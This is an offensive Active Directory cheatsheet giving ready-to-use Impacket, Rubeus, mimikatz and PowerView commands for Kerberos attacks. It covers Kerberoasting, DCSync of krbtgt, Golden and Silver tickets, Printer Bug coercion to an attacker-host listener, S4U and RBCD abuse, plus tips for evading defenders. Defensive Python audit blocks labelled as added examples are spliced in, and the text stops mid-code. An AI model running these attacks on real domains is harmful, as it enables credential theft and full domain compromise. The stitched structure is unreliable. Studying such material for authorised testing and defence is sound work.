AD Cheatsheet: Kerberos Attacks
Kerberos is the default authentication protocol in Active Directory, and its misconfigurations are among the most exploited vectors in real-world engagements. This post covers every major Kerberos attack technique with ready-to-use commands for both Linux and Windows. Each section includes enumeration, exploitation, and cracking steps.
Quick Reference Table
| Attack | Requires | Impact | Linux Tool | Windows Tool |
|---|---|---|---|---|
| Kerberoasting | Domain user | Service account passwords | GetUserSPNs.py | Rubeus kerberoast |
| AS-REP Roasting | Username list (or domain user) | Passwords of no-preauth accounts | GetNPUsers.py | Rubeus asreproast |
| Golden Ticket | krbtgt NTLM hash | Full domain compromise | ticketer.py | mimikatz |
| Silver Ticket | Service/machine NTLM hash | Access to specific service | ticketer.py | mimikatz |
| Pass-the-Ticket | Stolen TGT/TGS | Lateral movement | export KRB5CCNAME | Rubeus ptt |
| Unconstrained Delegation | Compromised delegation host | Capture TGTs (including DC) | krbrelayx.py | Rubeus monitor |
| Constrained Delegation | Compromised delegation account | Impersonate any user to allowed SPN | getST.py | Rubeus s4u |
| RBCD | Write on computer object | Impersonate any user to target | rbcd.py + getST.py | PowerMad + Rubeus s4u |
1. Kerberoasting
Request TGS tickets for accounts with SPNs, then crack them offline. Service accounts frequently have weak passwords.
Enumeration
Find accounts with SPNs set (Kerberoastable targets).
```bash
# Impacket - list kerberoastable users
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
```
```powershell
# PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# Manual LDAP query
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.Filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$search.FindAll() | ForEach-Object { $_.Properties["samaccountname"] }
```
Exploitation
```bash
# Impacket - request TGS hashes
GetUserSPNs.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast.txt
# With NTLM hash (pass-the-hash)
GetUserSPNs.py <DOMAIN>/<USER> -hashes :<NTHASH> -dc-ip <DC_IP> -request -outputfile kerberoast.txt
```
```powershell
# Rubeus - request all kerberoastable hashes
.\Rubeus.exe kerberoast /outfile:kerberoast.txt
# Rubeus - target specific user
.\Rubeus.exe kerberoast /user:<TARGET_USER> /outfile:kerberoast.txt
```
Cracking
```bash
# RC4 (etype 23) - fast
hashcat -m 13100 kerberoast.txt /path/to/wordlist.txt
# AES-256 (etype 18) - slower but sometimes required
hashcat -m 19700 kerberoast.txt /path/to/wordlist.txt
# AES-128 (etype 17)
hashcat -m 19600 kerberoast.txt /path/to/wordlist.txt
```
Tip: RC4 encryption in Kerberos is a red flag for defenders. Modern environments enforce AES, which is significantly slower to crack. If you only get AES tickets, allocate more cracking time or use targeted rules.
2. AS-REP Roasting
Accounts with "Do not require Kerberos preauthentication" enabled will return an encrypted TGT without proving identity. Crack it offline.
Find Targets
```bash
# With domain credentials (auto-enumerates vulnerable accounts)
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
# Without credentials (need a username list)
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -no-pass -dc-ip <DC_IP>
```
```powershell
# PowerView
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname
```
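The SPN enumeration in section 1 and the no-preauth enumeration here are both tests on user attributes, so they can be run offline against an export of user objects. The following is an added example, not code from this post or from Impacket/PowerView: it applies the same two tests to constructed directory records and additionally decodes msDS-SupportedEncryptionTypes to show which Kerberoastable accounts would still hand out RC4 (etype 23) tickets, the ones that crack fastest. The account names and SPNs are invented, and the rule that an unset msDS-SupportedEncryptionTypes on a user account falls back to RC4 is an assumption of the example.

```python
"""Roasting-exposure audit over constructed directory records (added example, not from the post)."""

# userAccountControl bits (AD schema)
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
RC4_HMAC = 0x04
AES128_CTS_HMAC_SHA1 = 0x08
AES256_CTS_HMAC_SHA1 = 0x10

# Constructed records shaped like the attributes an LDAP search returns; none are real accounts.
ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "userAccountControl": 0x10200, "msDS-SupportedEncryptionTypes": None},   # attribute never set
    {"sAMAccountName": "svc_web", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "userAccountControl": 0x10200,
     "msDS-SupportedEncryptionTypes": AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1},
    {"sAMAccountName": "svc_old", "servicePrincipalName": ["HOST/old01.corp.local"],
     "userAccountControl": 0x10200 | ACCOUNTDISABLE, "msDS-SupportedEncryptionTypes": RC4_HMAC},
    {"sAMAccountName": "legacy_app", "servicePrincipalName": [],
     "userAccountControl": 0x10200 | DONT_REQ_PREAUTH, "msDS-SupportedEncryptionTypes": None},
    {"sAMAccountName": "FILESRV01$", "servicePrincipalName": ["HOST/filesrv01.corp.local"],
     "userAccountControl": 0x1000,
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128_CTS_HMAC_SHA1 | AES256_CTS_HMAC_SHA1},
    {"sAMAccountName": "krbtgt", "servicePrincipalName": ["kadmin/changepw"],
     "userAccountControl": 0x202, "msDS-SupportedEncryptionTypes": None},
]


def is_enabled(acct):
    return not acct["userAccountControl"] & ACCOUNTDISABLE


def is_kerberoastable(acct):
    """Enabled user account with at least one SPN: any domain user can request a TGS encrypted
    with its key. Machine accounts ($) and krbtgt are skipped because their passwords are
    long and random, so the ticket is not realistically crackable."""
    name = acct["sAMAccountName"]
    return (bool(acct["servicePrincipalName"]) and is_enabled(acct)
            and not name.endswith("$") and name.lower() != "krbtgt")


def rc4_tickets_possible(acct):
    """True when a Kerberoast request can obtain an RC4 (etype 23) ticket for this account.
    Assumption (see lead-in): an unset msDS-SupportedEncryptionTypes on a user account means
    the KDC falls back to RC4."""
    etypes = acct["msDS-SupportedEncryptionTypes"]
    return etypes is None or bool(etypes & RC4_HMAC)


def no_preauth_required(acct):
    """Enabled account with 'Do not require Kerberos preauthentication' set (AS-REP roastable)."""
    return is_enabled(acct) and bool(acct["userAccountControl"] & DONT_REQ_PREAUTH)


def audit(accounts):
    roastable = [a for a in accounts if is_kerberoastable(a)]
    return {
        "kerberoastable": sorted(a["sAMAccountName"] for a in roastable),
        "kerberoastable_rc4": sorted(a["sAMAccountName"] for a in roastable if rc4_tickets_possible(a)),
        "asrep_roastable": sorted(a["sAMAccountName"] for a in accounts if no_preauth_required(a)),
    }


if __name__ == "__main__":
    for finding, names in audit(ACCOUNTS).items():
        print(f"{finding}: {', '.join(names) or '-'}")
```

Feed it the real records (PowerView's Get-DomainUser with the three attributes, or the LDAP query from section 1) and anything in kerberoastable_rc4 is the first candidate for a long random password or a group Managed Service Account, followed by setting AES-only in msDS-SupportedEncryptionTypes.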
Exploitation
```bash
# Request AS-REP hashes
GetNPUsers.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile asrep.txt
# Without credentials
GetNPUsers.py <DOMAIN>/ -usersfile users.txt -no-pass -dc-ip <DC_IP> -outputfile asrep.txt
```
```powershell
# Rubeus
.\Rubeus.exe asreproast /outfile:asrep.txt
# Target specific user
.\Rubeus.exe asreproast /user:<TARGET_USER> /outfile:asrep.txt
```
Cracking
```bash
hashcat -m 18200 asrep.txt /path/to/wordlist.txt
```
3. Golden Ticket
Forge a TGT using the krbtgt account hash. This grants unrestricted access to every service in the domain and is primarily used for persistence.
Prerequisites
You need all four of these:
- Domain name (FQDN)
- Domain SID
- Username to impersonate (typically Administrator)
- NTLM hash of the `krbtgt` account
Obtaining the krbtgt Hash
Requires DCSync privileges (Replicating Directory Changes + Replicating Directory Changes All) or Domain Admin.
```bash
# Impacket - DCSync
secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt
```
```text
# Mimikatz - DCSync
mimikatz # lsadump::dcsync /user:krbtgt /domain:<DOMAIN>
```
```powershell
# Get Domain SID
Import-Module .\PowerView.ps1
Get-DomainSID
```
Forging the Ticket
```bash
# Impacket - generate golden ticket
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator
# Use it
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <DOMAIN>/administrator@<DC_FQDN>
secretsdump.py -k -no-pass <DC_FQDN>
```
```text
# Mimikatz - forge and inject
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ptt
# Mimikatz - save to file
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ticket:golden.kirbi
```
```powershell
# Verify
klist
# Use
dir \\<DC_FQDN>\c$
Enter-PSSession <DC_HOSTNAME>
```
Tip: Golden Tickets survive password resets of every account EXCEPT krbtgt. The krbtgt password must be reset twice (it keeps one previous key) to invalidate all Golden Tickets. This is why Golden Tickets are the ultimate persistence mechanism.
4. Silver Ticket
Forge a TGS for a specific service using the service or machine account hash. Stealthier than a Golden Ticket because the forged ticket is presented directly to the service and is never validated by the DC.
Prerequisites
- Domain SID
- NTLM hash of the service or machine account
- Target SPN
- Username to impersonate
Common SPNs for Silver Tickets
| SPN | Access Gained |
|---|---|
| CIFS/host | SMB file system access |
| HTTP/host | WinRM / PSRemoting |
| HOST/host | PsExec, scheduled tasks |
| LDAP/host | DCSync (if target is a DC) |
| MSSQL/host | SQL Server access |
| TERMSRV/host | RDP access |
Forging the Ticket
```bash
# Impacket - forge silver ticket for CIFS
ticketer.py -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
    -spn CIFS/<TARGET_FQDN> Administrator
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <TARGET_FQDN>
```
```text
# Mimikatz - CIFS silver ticket with injection
mimikatz # kerberos::golden /domain:<DOMAIN> /user:Administrator /sid:<DOMAIN_SID> /rc4:<MACHINE_HASH> /target:<TARGET_FQDN> /service:cifs /ptt
```
```powershell
# Access the target
dir \\<TARGET_FQDN>\c$
```
Sacrificial Process (avoid overwriting legitimate tickets)
```powershell
# Create isolated logon session
.\Rubeus.exe createnetonly /program:cmd.exe /show
# Import ticket in the new window
.\Rubeus.exe ptt /ticket:silver.kirbi
```
Tip: A Silver Ticket for `LDAP/dc.domain.local` on a DC gives you DCSync capabilities without needing DCSync ACL permissions. This is a powerful escalation path when you have a DC machine account hash.
5. Pass-the-Ticket
Steal a TGT or TGS from another user's session and reuse it for lateral movement.
Windows - Extract and Inject
```powershell
# List all accessible tickets
.\Rubeus.exe triage
# Dump a specific ticket by LUID
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
# Inject a ticket (base64 or .kirbi)
.\Rubeus.exe ptt /ticket:<BASE64_TICKET>
.\Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klist
```
Linux - Use .ccache Files
```bash
# Set the ticket
export KRB5CCNAME=./user.ccache
# Use with any Impacket tool
psexec.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>
wmiexec.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>
smbclient.py -k -no-pass <TARGET_FQDN>
evil-winrm -i <TARGET_FQDN> -r <DOMAIN>
```
Convert Between Formats
```bash
# .kirbi (Windows) to .ccache (Linux)
ticketConverter.py ticket.kirbi ticket.ccache
# .ccache to .kirbi
ticketConverter.py ticket.ccache ticket.kirbi
```
Tip: Always use a sacrificial process (`Rubeus createnetonly`) on Windows before injecting tickets. Injecting into your current session can overwrite legitimate tickets and break existing service connections.
6. Unconstrained Delegation
Hosts with unconstrained delegation store a copy of the authenticating user's TGT in memory. Compromise the host, capture TGTs, and impersonate those users (including domain controllers via the Printer Bug).
Enumeration
```bash
# Impacket - find delegation configurations
findDelegation.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
```
```powershell
# PowerView - computers with unconstrained delegation
Import-Module .\PowerView.ps1
Get-DomainComputer -Unconstrained | Select-Object samaccountname, dnshostname
# Users with unconstrained delegation
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
```
Tip: Domain Controllers always have unconstrained delegation. Filter them out when looking for exploitable targets.
Exploitation - Printer Bug (Coerce DC Authentication)
The Printer Bug forces a remote host (typically the DC) to authenticate back to you, sending its TGT.
Windows (from compromised unconstrained delegation host):
```powershell
# Terminal 1: Monitor for incoming TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
# Terminal 2: Trigger DC authentication via Printer Bug
.\SpoolSample.exe <DC_FQDN> <COMPROMISED_HOST_FQDN>
# When Rubeus captures the DC$ TGT:
.\Rubeus.exe renew /ticket:<DC_TGT_BASE64> /ptt
```
```text
# DCSync with the DC's TGT
mimikatz # lsadump::dcsync /user:krbtgt
```
Linux:
```bash
# 1. Start krbrelayx listener (decrypts with compromised account hash)
sudo krbrelayx.py -hashes :<COMPROMISED_ACCOUNT_HASH>
# 2. Trigger DC authentication
printerbug.py <DOMAIN>/<USER>:<PASS>@<DC_IP> <ATTACKER_HOST>
# 3. Use captured DC TGT
export KRB5CCNAME=./DC01\$@DOMAIN.LOCAL_krbtgt@DOMAIN.LOCAL.ccache
secretsdump.py -k -no-pass <DC_FQDN>
```
7. Constrained Delegation
Accounts with constrained delegation can impersonate users ONLY to specific SPNs (defined in msDS-AllowedToDelegateTo). With Protocol Transition (S4U2Self), the account can impersonate any user without their interaction.
Enumeration
```bash
findDelegation.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
# Look for "Constrained w/ Protocol Transition" (most exploitable)
```
```powershell
# PowerView
Import-Module .\PowerView.ps1
Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
```
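The PowerView switches in sections 6 and 7 (-Unconstrained, -TrustedToAuth, the 524288 LDAP filter) are all tests on userAccountControl bits plus the msDS-AllowedToDelegateTo list. The check below is an added example, not code from this post or from PowerView: it classifies constructed computer and user records into unconstrained (TRUSTED_FOR_DELEGATION), constrained with protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) and Kerberos-only constrained (targets set without that bit), drops domain controllers via SERVER_TRUST_ACCOUNT as the section 6 tip suggests, and flags delegation targets that point at a DC, since an LDAP SPN there is the DCSync path noted in the Silver Ticket section. Hostnames, SPNs and the DOMAIN_CONTROLLERS set are constructed.

```python
"""Delegation audit over constructed computer/user records (added example, not from the post)."""

# userAccountControl bits (AD schema)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (524288 in the LDAP filter above)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
WORKSTATION_TRUST_ACCOUNT = 0x1000
NORMAL_ACCOUNT = 0x200

# Constructed records; hostnames and SPNs are invented for the example.
OBJECTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "APP01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/filesrv01.corp.local", "ldap/dc01.corp.local"]},
    {"sAMAccountName": "svc_proxy", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["HTTP/web01.corp.local"]},
    {"sAMAccountName": "WS05$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
]

# Constructed; in practice taken from the Domain Controllers OU.
DOMAIN_CONTROLLERS = {"dc01.corp.local"}


def classify(obj):
    """Map the delegation-related UAC bits and target list to one category."""
    uac = obj["userAccountControl"]
    if uac & SERVER_TRUST_ACCOUNT:
        return "domain_controller"  # unconstrained by design, not a finding (section 6 tip)
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained_protocol_transition"
    if obj["msDS-AllowedToDelegateTo"]:
        return "constrained_kerberos_only"
    return "none"


def dc_targets(obj):
    """SPNs in msDS-AllowedToDelegateTo whose host is a domain controller
    (LDAP on a DC is the DCSync path from the Silver Ticket section)."""
    hits = []
    for spn in obj["msDS-AllowedToDelegateTo"]:
        _service, _, host = spn.partition("/")
        if host.split(":")[0].lower() in DOMAIN_CONTROLLERS:
            hits.append(spn)
    return hits


def audit(objects):
    """One finding per non-DC object that has any form of delegation configured."""
    findings = []
    for obj in objects:
        kind = classify(obj)
        if kind in ("domain_controller", "none"):
            continue
        findings.append({"account": obj["sAMAccountName"], "delegation": kind,
                         "dc_targets": dc_targets(obj)})
    return findings


if __name__ == "__main__":
    for f in audit(OBJECTS):
        print(f"{f['account']:12} {f['delegation']:32} dc targets: {f['dc_targets'] or '-'}")
```

Unconstrained non-DC hosts and any protocol-transition account whose target list includes a DC SPN are the entries to remediate first; the former by switching to constrained or resource-based delegation, the latter by trimming the target list.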
Exploitation
```bash
# getST.py handles S4U2Self + S4U2Proxy automatically
getST.py -spn <ALLOWED_SPN> '<DOMAIN>/<DELEGATION_ACCOUNT>:<PASS>' -impersonate Administrator -dc-ip <DC_IP>
# Use the ticket
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>
```
```powershell
# Rubeus - S4U chain
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:<ALLOWED_SPN> /altservice:cifs /user:<DELEGATION_ACCOUNT> /rc4:<ACCOUNT_HASH> /ptt
# Access target
dir \\<TARGET_FQDN>\c$
Enter-PSSession <TARGET_HOSTNAME>
```
SPN Swap Trick
The SPN in the AP-REQ is not part of the encrypted ticket data. You can change the service name to access different services on the same host.
```bash
# Request ticket for TERMSRV but use it for CIFS
getST.py -spn TERMSRV/<TARGET> '<DOMAIN>/<ACCOUNT>:<PASS>' -impersonate Administrator
# Impacket automatically swaps to CIFS when using psexec.py
```
Tip: Useful service swaps: `TERMSRV` to `CIFS`, `HTTP` to `CIFS`, `WWW` to `HOST`. The swap works because all services on the same host share the machine account key.
8. Resource-Based Constrained Delegation (RBCD)
Unlike traditional constrained delegation (configured on the delegating account), RBCD is configured on the target computer via msDS-AllowedToActOnBehalfOfOtherIdentity. If you have write access to a computer object, you can configure RBCD on it.
Requirements
- Write access on the target computer object (GenericWrite, GenericAll, WriteDacl, or WriteProperty on the specific attribute)
- Control of an account with an SPN (a machine account works)
Exploitation - Standard (MachineAccountQuota >= 1)
Linux:
```bash
# 1. Create a fake machine account
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123!' \
    -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASS>
# 2. Configure RBCD on the target
impacket-rbcd -delegate-from 'YOURPC$' -delegate-to '<TARGET_COMPUTER>$' -action write \
    <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
# 3. Get ticket impersonating Administrator
getST.py -spn cifs/<TARGET_FQDN> -impersonate Administrator \
    -dc-ip <DC_IP> <DOMAIN>/'YOURPC$':'Password123!'
# 4. Use the ticket
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass <TARGET_FQDN>
wmiexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>
```
Windows:
```powershell
# 1. Create fake computer (Powermad)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount YOURPC -Password $(ConvertTo-SecureString "Password123!" -AsPlainText -Force)
# 2. Configure RBCD (PowerView)
Import-Module .\PowerView.ps1
$ComputerSid = Get-DomainComputer YOURPC -Properties objectsid | Select-Object -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# 3. Get hash and S4U
.\Rubeus.exe hash /password:Password123! /user:YOURPC$ /domain:<DOMAIN>
.\Rubeus.exe s4u /user:YOURPC$ /rc4:<HASH> /impersonateuser:administrator /msdsspn:cifs/<TARGET_FQDN> /ptt
```
Exploitation - SPN-less RBCD (MachineAccountQuota = 0)
When you cannot create machine accounts, use an existing user account with the U2U (User-to-User) extension.
```bash
# 1. Configure RBCD using a controlled user account (not a machine account)
impacket-rbcd -delegate-from <CONTROLLED_USER> -delegate-to '<TARGET_COMPUTER>$' -action write \
    <DOMAIN>/<ATTACKER_USER>:<PASS> -dc-ip <DC_IP>
# 2. S4U2Self (U2U) + S4U2Proxy
getST.py -u2u -impersonate Administrator -spn cifs/<TARGET_FQDN> \
    <DOMAIN>/<CONTROLLED_USER>:<PASS> -dc-ip <DC_IP>
# 3. Use the ticket
export KRB5CCNAME=./Administrator@cifs_<TARGET>.ccache
wmiexec.py -k -no-pass <DOMAIN>/administrator@<TARGET_FQDN>
```
Cleanup
```bash
# Remove RBCD configuration
impacket-rbcd -delegate-from 'YOURPC$' -delegate-to '<TARGET_COMPUTER>$' -action remove \
    <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
```
```powershell
# Windows cleanup
Get-DomainComputer <TARGET> | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
```
Tip: Always clean up RBCD configurations after exploitation. The `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute is commonly monitored by defenders and leaves a clear forensic trail.
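What the PowerShell above writes into msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative security descriptor, and the cleanup and monitoring side needs to read it back. The following is an added example, not code from this post, Impacket or PowerView: it builds a descriptor with the same full-control ACE mask as the SDDL `O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)`, parses it back into trustee SIDs, and lists any SID that is not on an approved list, which is the check a defender runs over every computer object that has the attribute set. Fetching the attribute over LDAP is left out; the SIDs and the approved list are constructed placeholders.

```python
"""Decode an msDS-AllowedToActOnBehalfOfOtherIdentity value (added example, not from the post)."""
import struct
from typing import List, Tuple

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL_MASK = 0x000F01FF              # CC DC LC SW RP WP DT LO CR SD RC WD WO from the SDDL above
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"     # the "BA" owner in the SDDL


def encode_sid(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, little-endian sub-authorities."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def decode_sid(buf: bytes, off: int) -> Tuple[str, int]:
    """Binary SID at offset -> (string form, offset just past it)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    text = "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))
    return text, off + 8 + 4 * count


def build_rbcd_descriptor(allowed_sids: List[str]) -> bytes:
    """Self-relative SD: 20-byte header, DACL with one full-control ACE per SID, then the owner SID.
    Used here only to construct test input."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = encode_sid(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL_MASK) + sid_bytes
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces  # ACL_REVISION = 2
    header_len = 20
    owner = encode_sid(BUILTIN_ADMINISTRATORS)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len + len(dacl), 0, 0, header_len)  # offsets: owner, group, sacl, dacl
    return header + dacl + owner


def parse_rbcd_descriptor(buf: bytes) -> List[Tuple[str, int]]:
    """Return (trustee SID, access mask) for every ACCESS_ALLOWED ACE in the DACL."""
    _rev, _sbz, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", buf, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", buf, off_dacl)
    pos = off_dacl + 8
    trustees = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", buf, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = decode_sid(buf, pos + 8)
            trustees.append((sid, mask))
        pos += ace_size  # skip unknown ACE types by their declared size
    return trustees


def unexpected_trustees(descriptor: bytes, approved: List[str]) -> List[str]:
    """Audit: SIDs allowed to act on behalf of the computer that are not on the approved list."""
    return [sid for sid, _mask in parse_rbcd_descriptor(descriptor) if sid not in approved]


# Constructed SIDs (placeholder domain identifier 21-1-2-3); nothing here refers to a real domain.
APPROVED = ["S-1-5-21-1-2-3-1105"]  # e.g. a documented front-end server that is meant to delegate
SAMPLE = build_rbcd_descriptor(["S-1-5-21-1-2-3-1105", "S-1-5-21-1-2-3-4201"])  # second SID unknown

if __name__ == "__main__":
    for sid, mask in parse_rbcd_descriptor(SAMPLE):
        print(f"{sid} mask=0x{mask:08X}")
    print("unexpected:", unexpected_trustees(SAMPLE, APPROVED))
```

Resolving each reported SID back to an account (and noticing one that matches a freshly created machine account, as in the MachineAccountQuota path above) is what turns the 4662 event in the detection section into an actionable finding.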
9. Decision Tree - What to Use When
Use this decision flow to pick the right Kerberos attack based on what you currently have:
Do you have the krbtgt NTLM hash?
- YES — Golden Ticket (full domain persistence)
- NO — continue below
Do you have a service or machine account NTLM hash?
- YES — Silver Ticket (targeted access to that service)
- NO — continue below
Do you have a stolen TGT or TGS?
- YES — Pass-the-Ticket (lateral movement)
- NO — continue below
Do you have domain user credentials?
- YES:
- Are there accounts with SPNs? — Kerberoasting (crack service passwords)
- Are there accounts without preauth? — AS-REP Roasting (crack those passwords)
- Is there delegation configured?
- Unconstrained — Printer Bug + capture TGTs
- Constrained w/ Protocol Transition — S4U chain
- Write on computer object — RBCD
- None — Look for ACL abuse paths instead
- NO (no creds at all):
- Do you have a list of usernames? — AS-REP Roasting (no creds needed)
- No usernames — Kerbrute user enumeration first
10. Detection and Hardening Notes
Understanding what defenders look for helps you operate more carefully and helps blue teamers improve their monitoring.
Key Event IDs
| Event ID | Description | Relevant Attack |
|---|---|---|
| 4768 | TGT requested (AS-REQ) | AS-REP Roasting, Golden Ticket |
| 4769 | TGS requested (TGS-REQ) | Kerberoasting, Silver Ticket |
| 4770 | TGS renewed | Pass-the-Ticket |
| 4624 | Successful logon | All ticket-based attacks |
| 4672 | Special privileges assigned | Golden Ticket, admin impersonation |
Detection Indicators by Attack
| Attack | What Gets Logged |
|---|---|
| Kerberoasting | Spike in 4769 events with RC4 encryption (etype 0x17) from a single source |
| AS-REP Roasting | 4768 events for accounts that normally require preauth |
| Golden Ticket | 4624 with blank Account Domain or FQDN instead of NetBIOS name |
| Silver Ticket | No DC-side logs (only on the target host) -- hardest to detect |
| Unconstrained Delegation | 4624 type 3 from unexpected sources on delegation hosts |
| RBCD | Modification of msDS-AllowedToActOnBehalfOfOtherIdentity (4662) |
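The table above says what each attack leaves in the Security log; the following is an added example, not from this post, that turns three of those rows into detection logic and runs it over constructed events: a per-source burst of RC4 (etype 0x17) 4769s for distinct non-machine service accounts, a 4768 accepted with Pre-Authentication Type 0, and a 4662 write to msDS-AllowedToActOnBehalfOfOtherIdentity. The event layout is simplified to one dict per event with only the fields the rules need, and the threshold (5 distinct services within 5 minutes) is an assumption to tune per environment.

```python
"""Toy detections for the Kerberos event patterns listed above, run over constructed events."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # etype 23, the Kerberoasting red flag from the table
AES256_CTS = 0x12
RBCD_ATTRIBUTE = "msds-allowedtoactonbehalfofotheridentity"


def _ev(timestamp, **fields):
    """Build one simplified Security-log event (constructed; not the real EVTX schema)."""
    fields["time"] = datetime.fromisoformat(timestamp)
    return fields


SERVICE_ACCOUNTS = ["svc_sql", "svc_web", "svc_backup", "svc_ftp",
                    "svc_sharepoint", "svc_exchange", "svc_jenkins", "svc_monitoring"]

SAMPLE_EVENTS = [
    # One workstation pulls RC4 service tickets for eight SPN accounts in 40 seconds (4769 burst).
    *[_ev(f"2024-05-01T09:00:{5 * i:02d}", id=4769, user="jdoe", service=svc, etype=RC4_HMAC, src="10.0.0.55")
      for i, svc in enumerate(SERVICE_ACCOUNTS)],
    # Normal traffic: a machine-account ticket and an AES ticket from another host.
    _ev("2024-05-01T09:00:41", id=4769, user="jdoe", service="FILESRV01$", etype=AES256_CTS, src="10.0.0.55"),
    _ev("2024-05-01T09:03:00", id=4769, user="asmith", service="svc_sql", etype=AES256_CTS, src="10.0.0.77"),
    # 4768 accepted with Pre-Authentication Type 0 (no preauth) next to a normal PA-ENC-TIMESTAMP (2) logon.
    _ev("2024-05-01T09:10:00", id=4768, user="svc_legacy", preauth_type=0, status=0x0, src="10.0.0.55"),
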